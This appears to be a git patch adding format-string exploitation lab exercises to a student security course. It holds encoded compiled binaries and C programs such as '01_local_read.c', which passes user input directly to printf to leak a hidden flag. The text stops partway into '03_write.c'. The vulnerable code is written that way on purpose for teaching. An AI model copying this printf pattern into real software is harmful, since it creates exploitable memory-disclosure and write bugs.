From 82e15702a79f07d168a4fb2342c07e77ae829622 Mon Sep 17 00:00:00 2001
From: didas72 <diogocruzdiniz@gmail.com>
Date: Thu, 8 Jan 2026 19:16:57 +0000
Subject: [PATCH] Lab7

---
 pa/lab7/01_local_read                 | Bin 0 -> 18704 bytes
 pa/lab7/01_local_read.c               |  20 ++++++++++++
 pa/lab7/03_write                      | Bin 0 -> 18824 bytes
 pa/lab7/03_write.c                    |  27 +++++++++++++++++
 pa/lab7/04_match_value                | Bin 0 -> 18848 bytes
 pa/lab7/04_match_value.c              |  27 +++++++++++++++++
 pa/lab7/05_write_specific_byte        | Bin 0 -> 19000 bytes
 pa/lab7/05_write_specific_byte.c      |  29 ++++++++++++++++++
 pa/lab7/06_write_big_number           | Bin 0 -> 18988 bytes
 pa/lab7/06_write_big_number.c         |  29 ++++++++++++++++++
 pa/lab7/07_call_functions             | Bin 0 -> 18468 bytes
 pa/lab7/07_call_functions.c           |  24 +++++++++++++++
 pa/lab7/08_return                     | Bin 0 -> 18400 bytes
 pa/lab7/08_return.c                   |  23 ++++++++++++++
 pa/lab7/chall_call_functions_again.py |  42 ++++++++++++++++++++++++++
 pa/lab7/chall_local_read.py           |  12 ++++++++
 pa/lab7/chall_return_address_again.py |  41 +++++++++++++++++++++++++
 pa/lab7/chall_short_local_read.py     |  12 ++++++++
 pa/lab7/chall_write_big_numbers.py    |  38 +++++++++++++++++++++++
 pa/lab7/chall_write_specific_byte.py  |  18 +++++++++++
 pa/lab7/chall_write_specific_value.py |  18 +++++++++++
 pa/lab7/chall_write_to_memory.py      |  16 ++++++++++
 22 files changed, 376 insertions(+)
 create mode 100755 pa/lab7/01_local_read
 create mode 100644 pa/lab7/01_local_read.c
 create mode 100755 pa/lab7/03_write
 create mode 100644 pa/lab7/03_write.c
 create mode 100755 pa/lab7/04_match_value
 create mode 100644 pa/lab7/04_match_value.c
 create mode 100644 pa/lab7/05_write_specific_byte
 create mode 100644 pa/lab7/05_write_specific_byte.c
 create mode 100755 pa/lab7/06_write_big_number
 create mode 100644 pa/lab7/06_write_big_number.c
 create mode 100755 pa/lab7/07_call_functions
 create mode 100644 pa/lab7/07_call_functions.c
 create mode 100755 pa/lab7/08_return
 create mode 100644 pa/lab7/08_return.c
 create mode 100644 pa/lab7/chall_call_functions_again.py
 create mode 100644 pa/lab7/chall_local_read.py
 create mode 100644 pa/lab7/chall_return_address_again.py
 create mode 100644 pa/lab7/chall_short_local_read.py
 create mode 100644 pa/lab7/chall_write_big_numbers.py
 create mode 100644 pa/lab7/chall_write_specific_byte.py
 create mode 100644 pa/lab7/chall_write_specific_value.py
 create mode 100644 pa/lab7/chall_write_to_memory.py

diff --git a/pa/lab7/01_local_read b/pa/lab7/01_local_read
new file mode 100755
index 0000000000000000000000000000000000000000..f554352eaa97edaa63df166e33ca01fdae140db2
GIT binary patch
literal 18704
zcmeHPdvILUc|Ug_)?I16l5OE9#A}eL0c#}-;RnXCBulbIWc=h61J|qFyAOM{yX@W-
z7Ii>ILx}NcMotL@LK06x5<1f+p4N0o(wW+bS7vAj=pSwRm_mWhQk;p)t4wj({(k4|
zk*)-pw*RJk?6c?mzVAEVIp;g)-t(P%@6r8zgZ+kK2pv4aD~P&I`pizG`E82RDZ(Ns
z)`%8yg_s8td7WdBK^#K?MjvR5Uc@uNXO8(y#znx4<bf<B5)|^8jAayHBwsXD`AEei
z_=wG5F#6s6Fu*DB5nDV$FuKbJ+k^=IrO#wsgGwJkWV@*!qM{l6X7Cuxz>MTm2jk0-
ze;I9OJP6FFdHddR;^)CX4<6&C;4y0cZt%Opup!#U7zdA0^Y?%c__@IP+3mgHyW9UE
zXpAh6YDHTnJ=B(ow`S7W(ve6p7wJ&EX7FhH?Kj;lP9J#Y?XUjrxywF$?0)g?k>{g_
zul_*`%Lfr@N6NqsXGvojrmUO#$zvd$wqjsfk4U~8hp-4ED`|i7mAB3^?+!5UbXbVo
z@@XUlG3SpC#6ub&4I_5DF!^id;Ql#y^BlZt4sHPUVJz6s1^6dm!x(M1URVRWtfCW7
zXRT7vj*EODopll-7R_XGF;R3189OTqb~G-A?crE{RKzm5qAhZHkS&X9P&!(0tl?-n
zE4B{~^lY;_BJJQMhjZB~&th{t@}EwLjOssSd&)GW)AK2D8v(*a%+GmfbnvXttTVu8
zios}RiUC^66a#W8Q%s;R(>h!aOikF0X+Y_!{nji{vp~%PH4D@%P_sbI0yPWNEKsw+
z|8EO?(D<cK_l=)7%j4Kw9Gm(8`?eF~7b}&@gJ&I2<<;@$%>z?z3stW3VMkF}ZQ{3a
zWtU+26b0V>7ZgfNN{oGnc=z=g%#G!{&&}Ya#D6-2!^Gd8!QAY<`^_2LPW-?O-bh@S
z#+B9F9VHr9_6pga%4+VC+?cy1H|DO%jk$YrWA38dn7b)A=B{c6ulw~~$KM=(`@-)1
zd&^g#X~(AiI3mQv_=UfzRCZ5{k1^SE%S&fh|AEikU48=X{_w=5EmMif#H6&B%n<==
zhJuO7XFE~V7XCOb&qBArxU9JO_&ek0n^UB6h?;&mHF4%jG82<JS0$+Ot&}|e+`00~
zbN}fvUVZHoC;W4%>vd;|)YY_GDSKThbFLIx565$COBc$ElB(A%r_h5J{iGSwHM`~C
zdzhu57!#|xd^MzxO+C>n1g6;`<4{-m+0QB!RCK)WJSi}g`35Xhj%xCS@vmK|l&+Z=
zUkdv1z7NOG2P>ry%X<`m{Jd{BV5M}vyi!r#TLs#ot)Ns&7s~(kUsAg)bfJ8M5;@U#
z{=}UZe>vrD*h#RCO&Mrdc@S+>6-|sEgk^S@&nPXE)1@W`TYMPf%H0>)u|4H=5c5y1
zWv@{8#3YODJtU4#mD8$dc@j$HkWJX1+<xHBiRi_t6FxQUdUVzGa&!4G3Lkr61ln%B
z1x5=VfA7T6mNjJy7vjWsnxJRm!61IGnmYHX$GK|V$JNoD7-8+VR-Bf#GCuMQrN&=0
zVBJk0l-?SDK6v0R>rOp36Bt(-VCux$7GBiM%WMB3wD{Q6e_Vsk%)Q<rRtq%?)GSc5
zK+OU*3)C!7vp~%PH4D@%@H=7wyh6k~NRMbs<%aFHn3HHrWTHtS_U+&Q`}<S270VS0
zcFeIzwbDfkZ!{f{i*{keE_@ATS9mucgbu!6z3`h#<te0N7b=yPk&1t>RE{F)LOO|b
z@%xp^KO+4pQdBD5LE3^e@<F9?8`3VM8KkF?K8y4jq^}_5du;~e-o3&&Y8oqoKHoP$
z=VJxFcRz~y<on;=I+HX$E_fO=`JNj2Fd`leh+edh?GPceKNP&NvBB{j5nGpUy1Jv~
za+c$BjMI=AL&^|FWcxeN{>PDuzL5E#r)R#uciiilcwq|7kTR#h`Y~kI&yhK#L}YuO
z2k&Q)8KBILpdkjD{GO8NY4nzk%xm&`N=NhOK<%FDeqkH+vOS+5{x!<@SO#GSB4orX
zpxGqI_6&xC4|%&oO<(tQhnmOz+d|>tP)m1cO>byzZ>W7|D7-z?+&vX)>V7d4?0zX^
zcE1pULh7f@FF=>J6KNUH-gMQ;YHFcoftm$s7N}XEW`UXoY8I$jpk{%Z1!@-fU9-UM
zZ~DwIBDO%>p2}~f`TaRQ$Q2jy?sgez_#Sr!Qtrw4O>+}4_n^cdeOAe>dBA6KKlKSx
ze$TxFDZiV(8<Bft?y)XGWZ>Rg;4Lb@t?okPJ{MmmizSFpkNZsKPa);^&n6<jp=XNs
zmbo#|@vbk&c4DiWI|PjE|2gpccU`Cpecg?C5HXK9hB%3M3h^|emfOB<+x6i!HxHGv
zPAR-8(iv%QU00H5-F+SHk@n6=$5o0hx99AhGLR6rz`RS@=4$w7*g$P>ea3e{4-SG5
z0@E$%`5p+~*Ou^=tJha|2jslQyv;~_8%Z+E4w5`|2~-7vTa`ekB>KMv5x>umkGh4Y
ziDlZ>-pf*^|DsIl_JZg+gQC92mOVm}&(8x9o`*<!d_@+ddA>SXl{o_Nh<}~A9=yOA
z0ROdhcv=E*4I1uWANV8WeSv=<XM+T0;Mb7#Z<HVyxDT5Bn<Quo{D@-LOVAt`rPyW(
zmIi)7&J7Y=8fYhHiv;07J?rU`pe67Z<aA50Ch!fG>5*V<;B|uD#k(NT9(bH${mnNc
z=?t7C*dbfJG4Lyb0SRshT*<cG*g!p9f#n1{7k&kxH}EONZfd+8pg-V{v&%dH+V(&_
z!Jfv$06PL#6Wl)k+YlQJyv;HPmW&|TANT>m9m|d(xh-%b!JV=>cLd51_TLrwF_MFU
z+sLu%R|CWYKOs0M+m;GUQ1y_>G06xI2XJ29vY#TUzk>$3Ce)CIM4gYi>wIJcIXBp@
z`J6YT_5d`zDFyCk_LR&X#jlk8Lu91v?}^YWWE~H&*>ye+cBl{4)IBUIp^vEUgv#HK
zytzEcNf3Msf`5nDD13h<OKt_#_fIUo6vfRI%gJqe8Pvc^PoqJVKF*j>9e(OtLNbr6
zsPB*(Lyw|U^&3>a1>*IaRZZ;Mc3|1wtzv-%y`I3l4Iufw2XRkX*hk6&KikFcPWar(
zcyiHB=<_tp`wcEbKCLpI{1!?ycab{3fwg;1X2c~opseAqBj$C;XJ5vX&99R>uPPN^
zoQMm<3{b!4WNOK`A$Jw>%^RW6sBhG|02UalLyH=`p%tM8#=?0`xVw243vcN9hRqF|
z8U}Dv^R|eFhA%?`#=26F;;&Ln409uxuoDxq%teMb)X<<x8z2PcyOeE&X#I?K4Dupy
zZ@`^9Xcz;FC_jG{s%V2;sMA$&>oN*8u0j`@s&qeFr|1i2i+Yyg5KBaCT{hDTcCBma
zqdicvC}PZTrs=G@*{z03E^&(vESeU^vr>qf+C&sx(f~s)<dSj|M$0QcL(VWh4b8`|
zJii61(N-!J<msSfEY@~p<9cg-r#dCnn#`8kHnpX*u}mp$3n^CxZ9{3N_<2g3Gn%(&
z(}hUd>Pc`Uh1x~?Itxc+q8W>)V<It<aE>N!C%{H)qyl6yZE%XFgonue1A~1aV1~@(
zc=9F(B36OoXwk9@g-p8WsA8oovT?;k)w#UG=h3!e3jadk_i%nL_BWfi`$OjCe$!0)
z8<T$A<1TMD+x)>_`Hd|;kAJ>*^fv!;^Q(UUxZf~W`GYCH-~5GH@*Cgt)Wd#IoX*B^
zqzC7ClGR7yMaOCDNoS*l(bn#4G&5RE7hCtmQn_5FwWEFAhPG`f91yazNxRs#`<`rT
zf37ebb@n+pJd`Z9B_u+xiL7EVm#}6Tt1X((%X3GxgY0(}9akrjq9e9tqcz1;uHb~Z
zY!%b@+Lj}^_Y~5OZRH)v@`-#=5{F6&Ybc5{Nfru@qzgG5Od5_B4%-FA=kQ3CR-$0r
z1-odW1c!=sW^&nNSpKjo4(MU%L4JKF>x`8Ouz99544t`5+{z^qMcWajY%!h8+VOBK
z6)lLO9V=jFj6^dfTa1)4S(nynNvR%3tyIf|CHu#Q@cfnPm+C|*%X3&A91b=Rr_sXO
z)@@J@MYwhN+7A3UrL4UrX~Syi7+|yzOKnN7-?%>9noP!r!mWvDaWorC!4$btv9*-F
z2jko7M29kV5lo!diXCpv7jh0>ZR85A7${mnGh&%&F{Rn*To#O2!iA@e&SBD*gpkL-
zrY+1#3_Iqd@#_RSnXq9cIiR1jhw3_2S+uS)dm@dwm4o?HJX9tvl#bh0JnBR-wmDqF
zQn)%RhR~f-Ud;hsPuc2-R3}M?R1ia{*oc}&az-d?k4UTNag}G`I0GfqbwP48@Ly_@
zr8x(2sYgp0bxYuU%9WhY-4v*ilL}4!qQLW^q^nb>>dd9WxNRWte5Jy;Yap2LrxjLi
zBmHfK)mseu+Y0kmsr+z-xx@;g{baB7q=ld#t@r`Sr@yT*y>{h?D~uI`q3Q>F)$TyF
zPh;*9;LcBDda-b%aE_L#7ft~K_Yq9JawmYyDUIpvLw*|5>lfmwX^iy)f%^}p-s)R1
z?mrY(y9({kd&Ods<@rIy=dJ<)z5x@jz?y=vb{b>lLf}`OOue&CY!Y+VGZVbhwRhvo
zW&m<t@ufL<<s2NAdn`@#;bkGurk<+W%L9ASf^WDm7iaFzScd!!NZDSjHPE$O^dr^w
zFtE!S2Iig)iIg8js_kdMevgq+4XmGfbRd2jApCt*-jKU5&4r@^{+|Qt`nY?030T|T
zfc;+u*7cG97O);)o`U@tSdWK+@!-3?3z#3A$qUiHOI;1(Y*-6C343tnFZ48uCxG?%
zg~c+_Ge>?u@JH48M)^a)+Vi7+ZXUINM|@;X`G<k|<uIzlY+WW61MB&_(9<MN0v`mw
z3;YGJ|6{<qJ(T|;unu8l&H%Sp^)2u$6X#rf_U|=d_Zi(c=J4O2gBx*+7(@STlx6#$
zLwahuz01W)@?kG&PxSx0D9`J0b5(u=Z!xE4&IErMc&5M01@{u#ccy-Brm`-3+Aewa
zXBn`*KP>bF1veQwuzwHC!6H_0iVhYB_)b`h?IhL=yI?uP7LFKa;e1(EJZB{{xgq#i
zaV%6tD_S}tV!7db#&+y@WW)N7Yrj~?N~E)CD_ST-N3rrdg;9|xM2E3}l!k{#QN)F?
z)~B6WqO)8Tw9T^m_jd2>v-)o8wJe}n1+Z-O-hNZ}&Vg;SIr2<2NLaqDz8zH!J9_sD
zYy04?p6)?wSAYM$zWvtz?w-LuYLzFcW5tqex;${*)#W}-4R<!e#Wo+q7YL>7;mFXD
z>RIjoNiMH^l9`oSp5vZX%9bl@b)kmYvCgWK+i2LVW8B~sb5<&vjc3#u@L6hRpCpG{
zfmM8#z})lVU%;dZXklT+=~>gmhRX+YI_a2|Ph;gz<gL^_XxLB@z9o;ISA7rbb0&%&
zf!O|?+p0q+Pp-SGREON%6cH(o4#Oot>J(I((m8l=b|Eh!S@=y6Y$zf_r8NEwK|1at
z!KupI1!uHM>h2kU+m#ejJO#H(MB<}aRH0J%5R!v$Ns4f^W&sO4bf5Anlg~IJA}td^
zHUg(pL>&7Fh@9+@$;m;C*s1FDPQ{@@BUMz*b5%m;Q9*P#4Q0t3bm52U(LVZG5!hHn
zaK#PdDgw<ODkV`aO21#jbT*OG`RLG4!5+~Ff1ttEc^FaO3;s7LS6klhc*~G~M*~24
z0IIaU6<z^I&xUgH?^S@&qD17c@{)w$ZePpEzgq!0KDX3C%ME~_<>+hi;bd3~A=PrX
zBL6X-JF;H-U~8&!%Ii{cl#L?NbD|u5vmMBsMxJ$`2~r=QiKY?h;ZcsyPCr5BZsc{K
zECXqL?nycNa)(feo{p}UbjJG-`J9w_`gmiI3nTBY7f?(f((|JneZNzX<ASI4u@A(L
zB2umgk<VtIhFll&l%pr5<@l(QZI$Ke3!-x^z&cQl;R!@7M<22sa+8vyerOZQ{t!{i
z(YHJc#u#WiP>%5@h+2+oTo>HQpRrTbKp6%;v($22%P(S5DNj(cWu46ZyecPEV2u=E
zA^0>)2i=e7K%hR#(YNUe<Ix@RI%v69LC|vaX`c$CA0$+Rmiv2P`h763^qu&3P&ALC
z%rpKgB0Xx#(Fbe#EpqRJ&#|B!eKY>umooC42MpB3@%<E$&7mCs=ElX}qK`saPWo=`
z@Oe;12i?AaOO8I#TF9{;9Vo}p2szSOZx`e`A$JgY9m3U2b5$SMGEnZCYMu$(#CTa%
zjx+`fa$%WMKa^phFRAmy_e1V2Hli9dZ{r-fp-v(8XeMNJwttS?pIwLJP@3tIBaLL;
z4?mpv<eYlRXLL<pk+~k@3`g#A&^r)mza~Upldj_8C?@G6u7cFVz}=NwuBk_eJ2ewL
Go&9g-n^<1}

literal 0
HcmV?d00001

diff --git a/pa/lab7/01_local_read.c b/pa/lab7/01_local_read.c
new file mode 100644
index 0000000..85bc168
--- /dev/null
+++ b/pa/lab7/01_local_read.c
@@ -0,0 +1,20 @@
+// gcc -m32 -Wall -Wextra -ggdb -no-pie
+
+#include <stdio.h>
+#include <unistd.h>
+#include "get_flag.h"
+
+#define BUFFER_LEN 64
+
+char buffer[BUFFER_LEN] = {0};
+
+void vuln() {
+    // Never prints secret_value
+    char *secret_value = get_flag();
+    printf(buffer);
+}
+
+int main() {
+    read(0, buffer, BUFFER_LEN-1);
+    vuln();
+}
diff --git a/pa/lab7/03_write b/pa/lab7/03_write
new file mode 100755
index 0000000000000000000000000000000000000000..4d6630862234a11398d3729ae4dcfa94167c3491
GIT binary patch
literal 18824
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
Vl4=)UhZ%N{bqaBpQbMP){|l1%1Bn0t

literal 0
HcmV?d00001

diff --git a/pa/lab7/03_write.c b/pa/lab7/03_write.c
new file mode 100644
index 0000000..842dd4a
--- /dev/null
+++ b/pa/lab7/03_write.c
@@ -0,0 +1,27 @@
+// gcc -m32 -Wall -Wextra -ggdb -no-pie
+
+#include <stdio.h>
+#include <unistd.h>
+#include "get_flag.h"
+
+#define BUFFER_LEN 128
+
+unsigned int target = 0;
+
+void vuln() {
+    char buffer[BUFFER_LEN] = {0};
